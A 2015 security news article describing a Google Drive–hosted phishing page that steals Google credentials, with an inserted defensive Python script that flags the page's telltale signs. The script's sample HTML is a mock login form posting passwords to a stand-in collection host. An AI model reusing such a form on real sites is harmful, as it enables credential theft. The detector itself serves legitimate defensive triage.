July 30, 2015 By Douglas Bonderud 3 min read

In March of 2014, cybercriminals ran a campaign of Google Drive phishing attacks designed to grab user credentials and gain complete account access. According to Threatpost, researchers at Elastica Cloud Threat Labs have discovered a new effort with eerily similar traits but one significant update: Additional code is now being used to obfuscate the attempted theft. Here’s a quick rundown of the newest threat aimed at Google users.

Seems Legitimate

With their new effort, attackers hope to trick users into clicking on a provided Google Drive link and entering their login credentials. But how are savvy users getting taken in by this kind of scam? It has to do with Drive itself. While most people use the service to store spreadsheets, photos and text documents, it’s also possible to host entire websites or single Web pages from it.

As noted by CSO Online, that’s the bait and switch: Drive is used to host a simple Web page that looks like the Google account login screen and asks for user credentials. Extra code is used to obfuscate JavaScript on the page, which collects login credentials and then forwards them to another website.

From the user perspective, everything seems above board. First, they receive an email saying a trusted contact or unknown entity wants to share a Drive document with them. Clicking the link takes them to a fake Google login page, but one that’s actually hosted on Google Drive itself. What’s more, the page is served over HTTPS with Google’s own SSL certificate, so the padlock and the domain both check out, making it almost impossible to distinguish from the real thing. Once users enter their username and password, they’re redirected to a PDF document, making the entire scam appear legitimate. Account login information, however, is long gone.

According to Aditya K. Sood of Elastica Cloud Threat Labs, there are a few telltale signs that the attack isn’t a legitimate sharing request. First is the header on the fake Drive page, which reads “Google Drive. One Storage.” What it should say is “One account. All of Google.” In addition, the fake page isn’t set up to actually check credentials; it simply sends them along to another server. This means that if users enter the wrong login and password, they’ll still be taken to off-site PDF documents. Finally, there’s a “Create an Account” link that simply reloads the current page.
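The three tells Sood describes can be turned into a quick triage check. The script below is an added example, not code from the original article or from Elastica: it parses a page’s HTML and flags a header that differs from the genuine sign-in page, a credential form whose action posts anywhere other than Google’s account service, and a “Create an account” link that resolves back to the page itself. The sample page, its URL and the list of allowed login hosts are all constructed assumptions for the example.

```python
"""Heuristic triage of a suspected Drive-hosted phishing page.

Added example, not part of the original article or Elastica's research. It
encodes the three tells the article lists (wrong header text, a form that
posts credentials off-site instead of to Google, a "Create an account" link
that only reloads the page) as checks over raw HTML. The sample page below
is constructed for this example, and ALLOWED_LOGIN_HOSTS is an assumption
about where a genuine Google sign-in form would submit.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

GENUINE_HEADER = "One account. All of Google."
ALLOWED_LOGIN_HOSTS = {"accounts.google.com"}  # assumption for the example


class _PageParser(HTMLParser):
    """Collects <form> actions, <a> hrefs with their text, and <h1>/<h2> text."""

    def __init__(self):
        super().__init__()
        self.forms = []        # action attribute of each <form>
        self.links = []        # (href, link text) for each <a>
        self.headers = []      # text inside each <h1>/<h2>
        self._in_header = False
        self._link_href = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.forms.append(attrs.get("action", ""))
        elif tag == "a":
            self._link_href = attrs.get("href", "")
            self._buf = []
        elif tag in ("h1", "h2"):
            self._in_header = True
            self._buf = []

    def handle_data(self, data):
        if self._in_header or self._link_href is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._link_href is not None:
            self.links.append((self._link_href, "".join(self._buf).strip()))
            self._link_href = None
        elif tag in ("h1", "h2") and self._in_header:
            self.headers.append("".join(self._buf).strip())
            self._in_header = False


def triage(page_url, html):
    """Return a list of phishing indicators found in `html`.

    `page_url` is where the page was fetched from; relative hrefs and form
    actions are resolved against it the way a browser would.
    """
    p = _PageParser()
    p.feed(html)
    findings = []

    # Tell 1: header text differs from the genuine sign-in page.
    if p.headers and GENUINE_HEADER not in p.headers:
        findings.append(f"header text {p.headers[0]!r} != {GENUINE_HEADER!r}")

    # Tell 2: the credential form submits somewhere other than Google's
    # account service; the real page never hands the password to a third party.
    for action in p.forms:
        host = urlsplit(urljoin(page_url, action)).hostname or ""
        if host not in ALLOWED_LOGIN_HOSTS:
            findings.append(f"form posts credentials to {host!r}")

    # Tell 3: "Create an account" points back at the page itself (or nowhere).
    page_no_frag = urlsplit(page_url)._replace(fragment="").geturl()
    for href, text in p.links:
        if "create" in text.lower() and "account" in text.lower():
            target = urlsplit(urljoin(page_url, href))._replace(fragment="").geturl()
            if target == page_no_frag:
                findings.append(f"'{text}' link only reloads the page ({href!r})")
    return findings


# Constructed sample modelled on the page the article describes; the URL is
# hypothetical and nothing here was captured from a real campaign.
SAMPLE_URL = "https://drive.google.com/host/EXAMPLE-DOC-ID/index.html"
SAMPLE_HTML = """
<html><body>
<h1>Google Drive. One Storage.</h1>
<form method="post" action="https://example.invalid/collect.php">
  <input name="Email"><input name="Passwd" type="password">
  <input type="submit" value="Sign in">
</form>
<a href="#">Create an account</a>
</body></html>
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_URL, SAMPLE_HTML):
        print("SUSPICIOUS:", finding)
```

The form-action check is the one worth keeping even when the lure text changes: whatever the page looks like, a sign-in form served from a Drive URL that posts the password to a non-Google host has no legitimate reason to exist, and that check does not depend on the attacker reusing the same header string.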

Phishing Attacks in a Big Pond

While Sood and colleagues immediately brought the phishing attacks to Google’s attention, this form of compromise continues to be a popular attack vector. According to Firstpost, for example, phishing attacks triggered a “massive surge in DNS threats” through Q2 of 2015, hitting a record high of 133 on the Infoblox DNS Threat Index during the quarter, almost tripling the score of Q2 2014.

While agencies are doing their best to combat phishing scams, many aren’t even sure what they’re looking for. After the recent U.S. Office of Personnel Management (OPM) breach in April, for example, the U.S. Army flagged an email from identity protection firm CSID as a phishing attempt even though the company had been hired by OPM to offer affected workers its services. The email did share some traits of classic phishing scams: a dot-com sender address where dot-gov would be expected, a link that asks for personal information and a clickable “Enroll Now” button. A quick look at OPM’s official website, however, would have cleared up any confusion.

There’s a massive pool of users leveraging countless secure and not-so-secure online services, giving malicious actors the ability to pick and choose what type they’ll reel in on any given day. As user knowledge increases, however, cybercriminals are turning to obfuscation and subtle misdirection to gain access — to the point that even large-scale government agencies can’t tell the difference. Best bet? Assume there’s a hook at the end of every unsolicited email — it’s never worth the risky bite.
